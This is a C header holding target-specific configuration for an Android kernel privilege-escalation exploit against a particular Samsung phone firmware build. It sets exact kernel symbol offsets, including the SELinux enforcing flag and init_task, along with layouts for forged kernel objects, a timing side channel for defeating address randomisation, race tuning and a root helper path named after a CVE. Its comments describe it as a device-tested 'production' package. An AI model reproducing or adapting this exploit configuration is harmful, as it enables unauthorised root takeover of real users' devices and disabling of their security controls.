#ifndef OFFSET_H
#define OFFSET_H

/* v2 production profile: a37x verified offsets + e2s-S926BXXUEDZDR
   device-tested production package, translated to this SoC's BTF
   (mm_struct 0x3c0, rt_mutex_waiter compact layout, skb_shared_info
   0x158). pselect_word_shift=1 auto-derived from this kernel's
   pselect/core_sys_select disassembly by extract_target.py. */

#if defined(APP_PAYLOAD) && APP_PAYLOAD
#define APP_TRACEFS_SLIDE 1
#define BUILD_VARIANT_LABEL "a37xv2-A376BXXU1AZB7-app-production-compact"
#define APP_PHYS_P0_ORACLE 1
/* Physical alias readback instead of configfs ARW (EOF-walled on this
   kernel's configfs_bin_read_iter compile). */
#define APP_FOPS_DEFER_ALIAS_READBACK 1
#define APP_FOPS_DATA_ALIAS_DIAG_ONLY 1
#define APP_FOPS_DATA_ALIAS_GATE_VERIFY 1
#define APP_FOPS_DURABLE_POSTWRITE_LOG 1
#define APP_ACCEPT_SCHED_TRIGGER 1

/* e1s-class retry budgets (proven on this device). */
#define SLIDE_KERNEL_PAGE_SETUP_ATTEMPTS 8
#define FOPS_KERNEL_PAGE_SETUP_ATTEMPTS 8
#define APP_SLIDE_FRESH_PAGE_ATTEMPTS 8
#define APP_SLIDE_KERNEL_PAGE_SEARCH_BATCHES 16
#define APP_FOPS_FRESH_PAGE_ATTEMPTS 8
#define APP_FOPS_KERNEL_PAGE_SEARCH_BATCHES 16
#else
#define BUILD_VARIANT_LABEL "a37xv2-A376BXXU1AZB7-root-umh"
#endif

#ifndef BUILD_FINGERPRINT
#define BUILD_FINGERPRINT \
  "samsung/a37xnaxx/a37x:16/BP4A.251205.006/A376BXXU1AZB7_OJM1AZB7:user/release-keys"
#endif

/* Exynos S5E8845, GKI android14-6.1, kernel 6.1.138-android14-11. */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0x80000000ULL
/* e2s proven production delta; pairs with APP_FOPS_TABLE_MIRROR_OFF. */
#define SKB_DATA_DELTA (-0xe80LL)
#define KERNELSNITCH_VERBOSE 1
/* Real mm_struct size from OUR kernel BTF (extract_target.py confirms
   0x3C0). Engine default 0x500 breaks the slab-scan stride here. */
#define MM_STRUCT_SZ 0x3c0

/* KernelSnitch tuning (e2s production). No MTE on Exynos S5E8845. */
#define KERNELSNITCH_COLLISION_CONFIRMATIONS 3

/* Reclaim shaping (e2s production). */
/* Object-index window scaled from e2s 27..30@32objs to 34 objs/slab
   (order-3 slab / mm_struct 0x3c0 -> 34 objects). */

#define SLIDE_FAKE_WAITER_PRIO 0
#define SLIDE_WAITER_WAKE_STATE 0
#define SLIDE_LOCK_OWNER_VALUE 1ULL
#define SLIDE_USE_FAKE_TASK 1
#define SLIDE_TRACEFS_EVENT_ID 106
#define SLIDE_TRACEFS_WORKER_CALLER_OFF 0x000dba84ULL
/* Auto-derived from THIS kernel: __arm64_sys_pselect6->core_sys_select,
   buffer=0x50 waiter=0x98 => shift 1 (extract_target.py). */
#define SLIDE_PSELECT_WORD_SHIFT 1
#define SLIDE_P0_OFFSET_CANDIDATES \
  0x000000ULL, 0x010000ULL, 0x020000ULL, 0x030000ULL, \
  0x040000ULL, 0x050000ULL, 0x060000ULL, 0x070000ULL, \
  0x080000ULL, 0x090000ULL, 0x0a0000ULL, 0x0b0000ULL, \
  0x0c0000ULL, 0x0d0000ULL, 0x0e0000ULL, 0x0f0000ULL, \
  0x100000ULL, 0x110000ULL, 0x120000ULL, 0x130000ULL, \
  0x140000ULL, 0x150000ULL, 0x160000ULL, 0x170000ULL, \
  0x180000ULL, 0x190000ULL, 0x1a0000ULL, 0x1b0000ULL, \
  0x1c0000ULL, 0x1d0000ULL, 0x1e0000ULL, 0x1f0000ULL
#define SLIDE_MAX_ATTEMPTS 32

#if defined(APP_PAYLOAD) && APP_PAYLOAD
#define ROUTE_WAIT_SECONDS 8
#define PSELECT_ENTER_DELAY_USEC 50000
#define SLIDE_PSELECT_TIMEOUT_NSEC 500000000L
#define SLIDE_KSNITCH_APPENDED_FUTEXES 2048
#define SLIDE_KSNITCH_REPEAT_MEASUREMENT 96
#define SLIDE_KSNITCH_AVERAGE 12
#define SLIDE_BANK_SLOTS 5
#define SLIDE_BANK_TASK_OFF 0x3200
#define SLIDE_BANK_TASK_STRIDE 0x1c0
#define SLIDE_BANK_LOCK_OFF 0x5200
#define SLIDE_BANK_SLOT_STRIDE 0x100
#define SLIDE_BANK_WAITER_OFF 0x40
#define P0_ORACLE_GATE_SLOT 0
#define P0_ORACLE_PROBE_SLOT 1
#define P0_ORACLE_GATE_RESTORE_SLOT 2
#define P0_ORACLE_PROBE_RESTORE_SLOT 3
#define P0_ORACLE_PRODUCTION_SLOT 4
#define P0_ORACLE_GATE_PAGE_OFF 0x0e80
#define P0_ORACLE_GATE_OBJECT_INDEX 1
#define P0_ORACLE_PROBE_OFFSET 0x1f0000ULL
#define P0_FINGERPRINT_HEADER \
  "targets/a37xv2-A376BXXU1AZB7/p0_fingerprint.h"

/* pselect route timing (e2s production). */

#define DEFAULT_EXPLOIT_ATTEMPTS 1
#define DEFAULT_ATTEMPT_TIMEOUT_SEC 2200
#define DEFAULT_P0_ATTEMPT_TIMEOUT_SEC 1200
#endif

#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffff81ce000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffff81ce000000ULL
#define VMEMMAP_START 0xfffffffd00000000ULL

/* Exact A376BXXU1AZB7 offsets (extract_target.py cross-validated). */
#define CALL_USERMODEHELPER_EXEC_WORK_OFF 0x000d4168ULL
#define NOOP_LLSEEK_OFF 0x0039cfd8ULL
#define COPY_SPLICE_READ_OFF 0x003eab0cULL
#define CONFIGFS_READ_ITER_OFF 0x0046a684ULL
#define CONFIGFS_BIN_WRITE_ITER_OFF 0x0046abb4ULL
#define ASHMEM_IOCTL_OFF 0x00d271e0ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x00d27b18ULL
#define ASHMEM_MMAP_OFF 0x00d27b70ULL
#define ASHMEM_OPEN_OFF 0x00d27d90ULL
#define ASHMEM_RELEASE_OFF 0x00d27e18ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x00d27f38ULL
#define ANON_PIPE_BUF_OPS_OFF 0x011f9890ULL
#define ASHMEM_FOPS_OFF 0x013b6548ULL
#define KMALLOC_CACHES_OFF 0x0177cb38ULL
#define SYSTEM_UNBOUND_WQ_OFF 0x0229ae60ULL
#define INIT_TASK_OFF 0x022af700ULL
#define ROOT_TASK_GROUP_OFF 0x024c3d40ULL
#define SELINUX_ENFORCING_OFF 0x025982a0ULL

/* ashmem_miscs miscdevice object; fops member at +0x10 per BTF. */
#define ASHMEM_MISC_FOPS_OFF 0x024337f0ULL

#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

#define ROOT_UMH_PATH "/data/local/tmp/cve-2026-43499-root"
#define SYSTEM_UNBOUND_WQ (KIMAGE_TEXT_BASE + SYSTEM_UNBOUND_WQ_OFF)
#define CALL_USERMODEHELPER_EXEC_WORK \
  (KIMAGE_TEXT_BASE + CALL_USERMODEHELPER_EXEC_WORK_OFF)
#define ROOT_UMH_WORK_OFF 0x6000
#define ROOT_UMH_DATA_OFF 0x6200

#define SLIDE_NFULNL_LOGGER_NAME_OFF 0x016b43e8ULL
#define SLIDE_NFULNL_LOGGER_OBJECT_OFF 0x022a29e0ULL
#define SLIDE_RB_PARENT_TYPE_RESTORE 1ULL
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF 0x023edf38ULL
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_SYSCTL_BOOTID_OFF 0x0267af58ULL

#define SLIDE_NFULNL_LOGGER_NAME_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_NAME_OFF)
#define SLIDE_NFULNL_LOGGER_OBJECT_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OBJECT_OFF)
#define SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_RANDOM_TABLE_BOOT_ID_DATA_PTR_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE \
  (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)

#define LOCK_OFF 0x2210
#define W0_OFF 0x2350
#define FOPS_OFF 0x2000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200

/* Compact rt_mutex_waiter construction: matches OUR kernel BTF
   (tree_entry@0, pi_tree_entry@0x18, task@0x30, lock@0x38,
   wake_state@0x40, prio@0x44, deadline@0x48, ww_ctx@0x50). */
#define COMPACT_RT_MUTEX_WAITER 1
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x40
#define FAKE_WAITER_PRIO_OFF 0x44
#define FAKE_WAITER_DEADLINE_OFF 0x48
#define FAKE_WAITER_WW_CTX_OFF 0x50
#define FAKE_WAITER_LAYOUT_SIZE 0x58

/* task_struct per BTF (identical to e2s). */
#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950

#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100

/* pool_workqueue / worker_pool / work_struct per BTF. */
#define WQ_DFL_PWQ_OFF 0xb0
#define PWQ_POOL_OFF 0x00
#define PWQ_WQ_OFF 0x08
#define PWQ_WORK_COLOR_OFF 0x10
#define PWQ_REFCNT_OFF 0x18
#define PWQ_NR_IN_FLIGHT_OFF 0x1c
#define PWQ_NR_ACTIVE_OFF 0x5c
#define PWQ_MAX_ACTIVE_OFF 0x60
#define POOL_WORKLIST_OFF 0x28
#define POOL_NR_IDLE_OFF 0x3c

#define WORK_DATA_OFF 0x00
#define WORK_ENTRY_OFF 0x08
#define WORK_FUNC_OFF 0x18

#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x18
#define STRUCT_PAGE_TYPE_OFF 0x30

#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10

#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0

#endif

/* Restored: minimum e2s shaping required by the data-alias pipe prep
   (kernelsnitch bruteforce conditions). Everything else stays stripped. */
#define KERNELSNITCH_MTE_ENABLED 0
#define KSNITCH_COLLISIONS 5

/* Stable-race package adopted from the device-tested e3q-S928BXXS6DZF2
   port (kernel 6.1.145). Delta uses OUR proven fragment geometry. */

/* Anti-crash hardening: stricter collision acceptance = fewer false
   positives reaching the physical-probe phase = fewer panics. */
#define KSNITCH_COLLISIONS 8
#define KERNELSNITCH_COLLISION_CONFIRMATIONS 8

/* ROOT-CAUSE FIX: kernel hashes futexes modulo round_pow2(possible_cpus*256).
   This device: possible=0-7 -> 2048 buckets. Bionic sysconf lies (reports 16
   -> 4096), so the engine default mis-indexed every measurement. */
#define KERNELSNITCH_FUTEX_HASH_SIZE 0x1000
